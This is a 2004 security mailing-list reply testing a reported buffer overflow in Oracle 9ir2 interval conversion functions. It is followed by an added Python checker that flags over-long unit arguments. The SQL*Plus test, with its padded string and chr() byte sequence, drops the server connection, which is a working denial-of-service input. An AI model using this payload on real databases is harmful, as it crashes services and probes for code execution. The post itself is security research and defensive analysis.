Re: [NEWS] Oracle Database 9ir2 Interval Conversion Buffer Overflow

Pete Finnigan

2004-02-26

Hi Jared,

I heard about this issue in early Feb. This guy Cesar Cerrudo posted a
message to vulnwatch about these two vulnerabilities and also said he
had a lot more. I saw a post on Bugtraq yesterday where someone was
asking for the patch info. It is not clear if an Oracle fix matches this
bug or not and which patch applies. There is no advisory.

Here is the header info from vulnwatch from his post. I have the full
email sent to vulnwatch, which is similar to Jared's version on
securiteam but is longer (no extra technical details, mostly rants).

<quote>
From:  Cesar [mailto:cesarc56@(protected)]
Sent:  Thu 2004-02-05 3:15 PM
To:   vulnwatch@(protected)
Cc:  
Subject:     [VulnWatch] Oracle Database 9ir2 Interval Conversion
Functions Buffer Overflow
Security Advisory

Name: Oracle Database 9ir2 Interval Conversion
Functions Buffer Overflow.
System Affected : Oracle Database 9ir2, previous
versions could be affected too.
Severity : High
Remote exploitable : Yes
Author:   Cesar Cerrudo.
Date:   02/05/04
Advisory Number:   CC020401
</quote>


Anyway I have run the following test based on what he said in his
advisory:

SQL> edit
Wrote file afiedt.buf

1 SELECT NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJK
LMNOPQR'
2 || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)|
|chr(18)||chr(80)||chr(255)|
3 ||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)|
|chr(33)||chr(148)||chr(01)|
4* ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL
SQL> /
ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL
                             *
ERROR at line 4:
ORA-03113: end-of-file on communication channel


SQL> select sysdate from dual;
select sysdate from dual
*
ERROR at line 1:
ORA-03114: not connected to ORACLE


SQL>
SQL> connect system/manager@(protected)
Connected.
SQL> edit
Wrote file afiedt.buf

1 SELECT NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJK
LMNOPQR'
2 || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)|
|chr(18)||chr(80)||chr(255)|
3 ||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)|
|chr(33)||chr(148)||chr(01)|
4* ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL
SQL> /
SELECT NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOP
QR'
*
ERROR at line 1:
ORA-03113: end-of-file on communication channel


SQL> select sysdate from dual;
select sysdate from dual
*
ERROR at line 1:
ORA-03114: not connected to ORACLE


SQL>

So yes, both of these vulnerabilities will terminate the Oracle
connection, so it's possible it could be exploited remotely. The file >
c:\Unbreakable.txt is not created though. I have not tried under a
debugger to see if anything can be done with the 3113 error in terms of
exploiting the stack. If this is a true buffer overflow exploit then he
would need to pass some sort of shell code and manipulate the stack to
run it. Maybe his chr(??) are some sort of shell code for it to be a
buffer overflow and capture the machine. On the surface it doesn't seem
to work though.

SQL*net trace didn't tell me much and also an Oracle core is created in
the cdump directory with the are you sure text on the top of the stack.
I ran this on XP 9ir2 personal edition.

Kind regards

Pete
--
Pete Finnigan
email:pete@(protected)
Web site: http://www.petefinnigan.com - Oracle security audit specialists
Book:Oracle security step-by-step Guide - see http://store.sans.org for details.
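
Added example, not part of the original post or of any Oracle code: a static check a DBA could run over captured SQL text to flag NUMTOYMINTERVAL / NUMTODSINTERVAL calls whose unit argument is not one of the short documented literals, which is the argument the test above overfills. The function names and the sample statement are constructed for illustration.

```python
import re

# Interval-unit literals the Oracle SQL reference lists for each function.
VALID_UNITS = {"NUMTOYMINTERVAL": {"YEAR", "MONTH"},
               "NUMTODSINTERVAL": {"DAY", "HOUR", "MINUTE", "SECOND"}}
CALL_RE = re.compile(r"\b(NUMTOYMINTERVAL|NUMTODSINTERVAL)\s*\(", re.I)
LITERAL_RE = re.compile(r"'([^']*)'\Z")  # exactly one plain string literal

def split_args(sql, pos):
    """Split call arguments (pos = index after '(') on top-level commas."""
    args, cur, depth, in_str = [], "", 0, False
    while pos < len(sql):
        ch = sql[pos]
        if in_str:
            in_str = ch != "'"      # a doubled '' simply reopens the string
        elif ch == "'":
            in_str = True
        elif ch == "(":
            depth += 1
        elif ch == ")" and depth == 0:
            return args + [cur.strip()]
        elif ch == ")":
            depth -= 1
        elif ch == "," and depth == 0:
            args.append(cur.strip())
            cur, ch = "", ""
        cur += ch
        pos += 1
    return None                     # call never closed

def find_suspect_interval_calls(sql):
    """Return (function, reason) pairs; binds and expressions are reported too."""
    findings = []
    for m in CALL_RE.finditer(sql):
        func = m.group(1).upper()
        args = split_args(sql, m.end())
        if args is None or len(args) != 2:
            findings.append((func, "malformed call"))
            continue
        lit = LITERAL_RE.match(args[1])
        if lit is None:
            findings.append((func, "unit is not a plain string literal"))
        elif lit.group(1).strip().upper() not in VALID_UNITS[func]:
            findings.append((func, "unknown unit of length %d" % len(lit.group(1))))
    return findings

# Constructed sample statement with an over-long unit string.
SAMPLE = "SELECT NUMTOYMINTERVAL(1, 'AAAAAAAAAABBBBBBBBBBCCCCCCCCCC') FROM dual"
if __name__ == "__main__":
    print(find_suspect_interval_calls(SAMPLE))
```

Bind variables and concatenated expressions are reported because their run-time value cannot be checked from the statement text alone; those hits need manual review rather than automatic blocking.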
